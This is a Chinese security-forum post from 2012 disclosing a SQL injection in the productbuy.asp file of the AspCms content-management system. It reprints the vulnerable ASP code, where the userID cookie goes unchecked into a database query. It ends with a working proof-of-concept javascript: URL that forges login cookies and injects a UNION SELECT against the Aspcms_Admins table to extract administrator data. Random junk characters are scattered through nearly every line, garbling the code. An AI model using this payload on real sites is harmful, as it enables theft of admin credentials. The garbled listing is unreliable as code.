好久没上土司了,上来一看发现在删号名单内.....1 P. c$ A/ a0 ^$ v; H8 W' c" w6 G% g) x
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。1 P, Q- E- J C1 Z# T8 ~
废话不多说,看代码:
- a8 M9 P. J# R* Q
9 b: L2 L% K! P# r, P4 x7 f: S! q<%
; D2 t2 m) [) [+ G" D1 z' A9 T7 z
/ }: P4 m5 R7 c& {if action = "buy" then
% d5 X' y7 ]" p. S1 \
8 Q: p; U& ?+ D2 O addOrder()0 q0 j% r# i( k2 f
' e5 z& p: t7 h o4 O2 l/ I
else2 i) k9 H! S, z2 m
9 b5 _1 [& _, J8 j7 C9 L0 I echoContent() q. W4 S. l1 A, |
- ^; g* p6 W6 @7 E$ t9 v/ Y- X# K8 [- b* W
end if
/ { g: T/ t! |; q1 t( w% v9 N; h4 A* b
' K1 J4 X; S7 G
- ~7 N7 p7 i. m& D+ A……略过
3 F7 G( n1 {8 S& K/ k+ L, j' n
; X$ F9 q6 \" H4 G/ m1 p6 S% a S
( a% D7 H2 K& [* a- r8 j0 M J- ]
+ s* i9 |7 W8 s& L: S# zSub echoContent()3 ] {* o5 \, v* Q3 G; B" L
. T+ H B0 T, B5 v3 y& F( B h dim id
- h1 f2 i) h0 l+ l3 u2 o
9 \, F+ P. A# D5 x9 z0 z id=getForm("id","get")9 w1 @9 z+ {2 ^( N
* m4 @: J l! l$ a+ e % Q' r2 y- H6 E4 U7 u. Q D' L
" `) \& l/ q! g8 n" @+ B4 f
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
3 [; ^5 \" b! K2 o0 c+ S2 U
P1 d% w6 q) ?+ t9 O6 W ' U) x9 X6 {" N% F: h
2 @& L: V. o/ w) B
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")( L! K8 A* m/ Z! u
' @( L4 |. C0 L& H3 ]2 g, Z8 y dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
4 ]5 b) g L+ d
4 `, r* L' o3 S. v& B, c, [! d0 b6 c Dim templatePath,tempStr( P! k K. o! k' C1 O
0 f- v% i5 G" x- {- s8 M templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
' U- m; x) e ?$ {2 i' t, f
8 s+ R! r1 E3 _! r! s
9 n% |1 @2 [; `' a' g9 I# O$ |) b: G5 L3 Z
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")" v5 U+ G @3 x7 p. O
1 m0 v& v% v; o6 \6 ?: b6 N1 W selectproduct=rsObj(0)
. \% `% V' e1 J) y% R/ h7 @+ h1 @( e! Z
& ^. a$ L. ~( e4 I/ D% Y- a U
6 i% y8 f6 B7 ~9 [. v
Dim linkman,gender,phone,mobile,email,qq,address,postcode7 L7 i7 Y- _' y# Z, u# f
4 j, @; D% ]! b+ U1 f9 W2 c if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
7 P! z/ M2 Z% F! f
' l- d2 c' L2 d1 e- K. c if rCookie("loginstatus")=1 then / v, S' f2 E" Y6 _5 \
' ` L4 w- O. o, {1 d: z8 v% z9 X
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")% w" A% A& q4 D# O# r
4 r b0 A( k7 G6 U# P linkman=rsObj("truename")
4 [4 W+ L3 y9 d5 F8 R
- _; X9 c9 ?1 Y2 E; _: M: ? gender=rsObj("gender")- t: k q7 t7 U/ f: A9 l
( M' r& K+ F& @" I" p! r, m
phone=rsObj("phone")
. s/ Q" G- m9 y+ p) L
& l+ Y' b# K2 d+ H, ~9 a mobile=rsObj("mobile")
5 q: ?! Z& S7 p/ V4 l7 o: J( `6 R
. ?6 s/ j/ g, u- {( e( _" \ email=rsObj("email"). n* `* {% r0 r" z+ S- k
. ?# `: N* l9 {0 U5 s X+ h- \0 e qq=rsObj("qq")
# {! p$ Z- F( {, I |
5 r& z4 o4 A) {% y6 @& S, f address=rsObj("address")7 @9 x; j% w/ q- V, J( Y5 V6 s
7 z% [; v4 N% M) I* N
postcode=rsObj("postcode")
2 Q' W1 H9 A2 t q& {! A- Y
- h! _9 M5 r" L i+ | else * V0 i G6 |* R% _& }
* j s+ f5 Q! V$ c c7 v2 ^" R+ y/ R
gender=13 F' S r% {8 D v$ @2 I
, n i' _! h i$ s4 n3 u+ c" d, n end if
0 Q9 e1 p* [& Z/ [( ]0 h7 ?0 e+ o' y) c$ |9 X& c8 o; j
rsObj.close()
+ k7 q1 l: N/ e5 t0 H5 P: V4 ]" q9 d: K* o1 ?. |
% u7 R8 T" U. D" O; \7 p8 g2 K( @" H4 ^5 _
with templateObj
' g# h8 i3 Z2 s" }' [" ^
' f' I% y2 _) d8 D .content=loadFile(templatePath) ! y% I$ N9 V5 J; k1 b$ T) G
& N: ^- x( F$ P .parseHtml()
. w9 Q% V7 S7 W& T# I2 T7 l1 p6 J1 T0 N/ G
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct), b3 {0 p9 R6 n% F$ P
8 {& E. B) E& O2 U" S .content=replaceStr(.content,"[aspcms:linkman]",linkman) 0 r7 o. k1 c. Y
4 c1 W8 t8 B3 ^1 p2 \/ U
.content=replaceStr(.content,"[aspcms:gender]",gender)
0 ]) C- [# b. z# T* G# u7 B! V: P$ S. B0 B' L2 E
.content=replaceStr(.content,"[aspcms:phone]",phone) # o. v" O/ k- h' u
5 U2 V9 S+ f7 A" j .content=replaceStr(.content,"[aspcms:mobile]",mobile)
3 U6 e- u1 B% [+ b
" V( M" g& F6 b7 B .content=replaceStr(.content,"[aspcms:email]",email) / {" ?; }& z0 t# i( _4 y
4 v2 f& s7 P2 Z; B, ?# G
.content=replaceStr(.content,"[aspcms:qq]",qq) 2 w; ~. E5 r8 w t
2 w; o- ?* ~/ V- l
.content=replaceStr(.content,"[aspcms:address]",address)
- h# i* @5 q) ~3 O. ?3 u7 R
& V7 d( ^' F% g6 L1 p. ?! D1 t3 P9 D8 k .content=replaceStr(.content,"[aspcms:postcode]",postcode)
1 X. `3 \& x( C( Y: @7 i1 z# t: ^
) R5 }: H6 [* E$ A: x& n .parseCommon() ( v0 |1 }' B+ U* e2 P" W) I
4 Y2 R* F; i: s Q
echo .content
7 ~3 ]) @5 k" `9 |4 t% q1 Q" O) b9 z; H
end with
4 @. A) G: y- [& _, y3 h+ B7 B5 v6 V" O4 t
set templateobj =nothing : terminateAllObjects O7 X' i! u0 r1 ~, t- V8 e
. U/ U, H" @* _' S# E& ~
End Sub
, F! W0 ~9 H3 @ Q' f, ~漏洞很明显,没啥好说的
) L# L8 F5 A3 I: opoc:1 {: H5 R0 n& I1 x, g" P! ]/ i
. H: @) r p* Jjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子4 g1 ?3 D2 i0 ]9 z
, n1 `1 s8 L5 ?# X* M6 A |
发表于 2012-12-27 08:35:05
收藏
支持
反对